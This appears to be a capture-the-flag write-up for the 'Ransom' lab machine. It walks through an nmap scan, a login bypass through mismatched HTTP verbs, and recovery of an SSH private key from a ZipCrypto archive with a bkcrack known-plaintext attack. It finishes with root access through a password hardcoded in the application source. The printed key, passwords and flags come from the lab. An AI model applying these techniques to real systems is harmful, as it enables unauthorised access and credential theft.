Ransom

Recon

nmap_scan.log

Open 10.129.227.93:22
Open 10.129.227.93:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.227.93

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDZBURYGCLr4lZI1F55bUh/6vKCfmeGumtAhhNrg9lH4UNDB/wCjPbD+xovPp3UdbrOgNdqTCdZcOk5rQDyRK2YH6tq8NlP59myIQV/zXC9WQnhxn131jf/KlW78vzWaLfMU+m52e1k+YpomT5PuSMG8EhGwE5bL4o0Jb8Unafn13CJKZ1oj3awp31fRJDzYGhTjl910PROJAzlOQinxRYdUkc4ZT0qZRohNlecGVsKPpP+2Ql+gVuusUEQt7gPFPBNKw3aLtbLVTlgEW09RB9KZe6Fuh8JszZhlRpIXDf9b2O0rINAyek8etQyFFfxkDBVueZA50wjBjtgOtxLRkvfqlxWS8R75Urz8AR2Nr23AcAGheIfYPgG8HzBsUuSN5fI8jsBCekYf/ZjPA/YDM4aiyHbUWfCyjTqtAVTf3P4iqbEkw9DONGeohBlyTtEIN7pY3YM5X3UuEFIgCjlqyjLw6QTL4cGC5zBbrZml7eZQTcmgzfU6pu220wRo5GtQ3U=
|   256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJZPKXFj3JfSmJZFAHDyqUDFHLHBRBRvlesLRVAqq0WwRFbeYdKwVIVv0DBufhYXHHcUSsBRw3/on9QM24kymD0=
|   256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEDIBMvrXLaYc6DXKPZaypaAv4yZ3DNLe1YaBpbpB8aY
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-title:  Admin - HTML5 Admin Template
|_Requested resource was http://10.129.227.93/login
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

Request is sent to /api/login with JQuery

<script>
$(document).ready(function () {
    $("#loginform").submit(function () {
        $.ajax({
            type: "GET",
            url: "api/login",
            data: {
                password: $("#password").val(),
            },
            success: function (data) {
                if (data === "Login Successful") {
                    window.location.replace("/");
                } else {
                    document.getElementById("alert").style.visibility =
                        "visible";
                    document.getElementById("alert").innerHTML =
                        "Invalid Login";
                }
            },
        });
        return false;
    });
});
</script>

└─$ curl http://10.129.227.93/login?password=x -X OPTIONS -is | grep -E '^(HTTP|Allow)'
HTTP/1.1 200 OK
Allow: GET,HEAD,POST

└─$ curl http://10.129.227.93/login?password=x -X POST -is | head -1
HTTP/1.1 419 unknown status

└─$ curl http://10.129.227.93/login?password=x -X GET -is | head -1
HTTP/1.1 200 OK

└─$ curl http://10.129.227.93/api/login?password=x -X OPTIONS -is | grep -E '^(HTTP|Allow)'
HTTP/1.1 200 OK
Allow: GET,HEAD

└─$ curl http://10.129.227.93/api/login?password=x -X GET -is | head -1
HTTP/1.1 200 OK

└─$ curl http://10.129.227.93/api/login?password=x -X POST -is | head -1
HTTP/1.0 405 Method Not Allowed

Application crashes when we make request to POST on /api/login

Sending POST request, but with GET verb still works and logs us in.

Assign yourself cookie inside browser, go to / and dashboard will render.

User.txt

> http://10.129.227.93/user.txt
516715c9b3590a1f9da37c175f2971d2

SSH (22)

Zip requires password

└─$ unzip uploaded-file-3422\ \(1\).zip
Archive:  uploaded-file-3422 (1).zip
[uploaded-file-3422 (1).zip] .bash_logout password:

└─$ 7z l uploaded-file-3422\ \(1\).zip
   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2020-02-25 07:03:22 .....          220          170  .bash_logout
2020-02-25 07:03:22 .....         3771         1752  .bashrc
2020-02-25 07:03:22 .....          807          404  .profile
2021-07-02 13:58:14 D....            0            0  .cache
2021-07-02 13:58:14 .....            0           12  .cache/motd.legal-displayed
2021-07-02 13:58:19 .....            0           12  .sudo_as_admin_successful
2022-03-07 07:32:54 D....            0            0  .ssh
2022-03-07 07:32:25 .....         2610         1990  .ssh/id_rsa
2022-03-07 07:32:46 .....          564          475  .ssh/authorized_keys
2022-03-07 07:32:54 .....          564          475  .ssh/id_rsa.pub
2022-03-07 07:32:54 .....         2009          581  .viminfo
------------------- ----- ------------ ------------  ------------------------
2022-03-07 07:32:54              10545         5871  9 files, 2 folders

└─$ zip2john uploaded-file-3422\ \(1\).zip -o .ssh/id_rsa > hash
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes

John couldn't crack the password, so the password is most probably not inside rockyou.

Encryption method is ZipCrypto, which is old and known to be vulnerable to plaintext (crib) attack.

https://xhacka.github.io/posts/writeup/2023/07/29/MCTEENX/

└─$ curl -LOs https://github.com/kimci86/bkcrack/releases/download/v1.7.0/bkcrack-1.7.0-Linux.tar.gz
└─$ tar -xvzf bkcrack-1.7.0-Linux.tar.gz
└─$ echo '-----BEGIN OPENSSH PRIVATE KEY-----' > known.txt
➜ .\bkcrack.exe -C .\uploaded.zip -c .ssh/id_rsa -p known.txt
bkcrack 1.7.0 - 2024-05-26
[18:10:59] Z reduction using 29 bytes of known plaintext
100.0 % (29 / 29)
[18:11:00] Attack on 266925 Z values at index 6
100.0 % (266925 / 266925)
[18:19:08] Could not find the keys.

First attempt at retrieving id_rsa failed, probably because the plaintext is too short or it's doesn't start with given plaintext.

My bash_logout size matches the one in zip, and probably it's also not commonly changed file.

└─$ ls -l ~/.bash_logout
Permissions Size User  Date Modified Name
.rw-r--r--   220 woyag 26 Nov  2023  󱆃 /home/woyag/.bash_logout

└─$ cp ~/.bash_logout .
└─$ zip bash_logout.zip .bash_logout
  adding: .bash_logout (deflated 28%)

➜ .\bkcrack.exe -C .\uploaded.zip -c .bash_logout -P .\bash_logout.zip -p .bash_logout
bkcrack 1.7.0 - 2024-05-26
[18:41:19] Z reduction using 151 bytes of known plaintext
100.0 % (151 / 151)
[18:41:20] Attack on 54321 Z values at index 6
Keys: 7b549874 ebc25ec5 7e465e18
5.3 % (2861 / 54321)
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 2861
[18:41:24] Keys
7b549874 ebc25ec5 7e465e18

➜ .\bkcrack.exe -C .\uploaded.zip -k 7b549874 ebc25ec5 7e465e18 -D decrypted.zip
bkcrack 1.7.0 - 2024-05-26
[18:43:51] Writing decrypted archive decrypted.zip
100.0 % (9 / 9)

└─$ unzip decrypted.zip -d decrypted
└─$ cat decrypted/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

└─$ cat decrypted/.ssh/id_rsa.pub
ssh-rsa ... htb@ransom

└─$ chmod 600 *.id_rsa
└─$ ssh -i htb.id_rsa htb@10.129.227.93
htb@ransom:~$ id
uid=1000(htb) gid=1000(htb) groups=1000(htb),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

Privilege Escalation

htb@ransom:/srv/prod$ grep password . -Rin | grep -vE 'js|css|vendor' 2>/dev/null
htb@ransom:/srv/prod$ grep 'password\b' . -Rin | grep -vE 'js|css|vendor|framework'
...
./app/Http/Controllers/AuthController.php:37:        if ($request->get('password') == "UHC-March-Global-PW!") {
...
./.env:16:DB_PASSWORD=P@ssw0rd1!
...
./database/factories/UserFactory.php:21:            'password' => '$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi', // password

htb@ransom:/srv/prod$ sudo -l
[sudo] password for htb: P@ssw0rd1!
Sorry, try again.
sudo: 1 incorrect password attempt
htb@ransom:/srv/prod$ sudo -l
[sudo] password for htb: UHC-March-Global-PW!
sudo: 1 incorrect password attempt
htb@ransom:/srv/prod$ su
Password: UHC-March-Global-PW!
root@ransom:/srv/prod# id
uid=0(root) gid=0(root) groups=0(root)

Creds: root:UHC-March-Global-PW!

Root.txt

root@ransom:/srv/prod# cat /root/root.txt
35b7e0707ad4322eb1ca03ab49963b5e

PreviousPrevise NextRebound

Last updated 8 months ago

hashtagRecon

hashtagHTTP (80)

hashtagUser.txt

hashtagSSH (22)

hashtagPrivilege Escalation

hashtagRoot.txt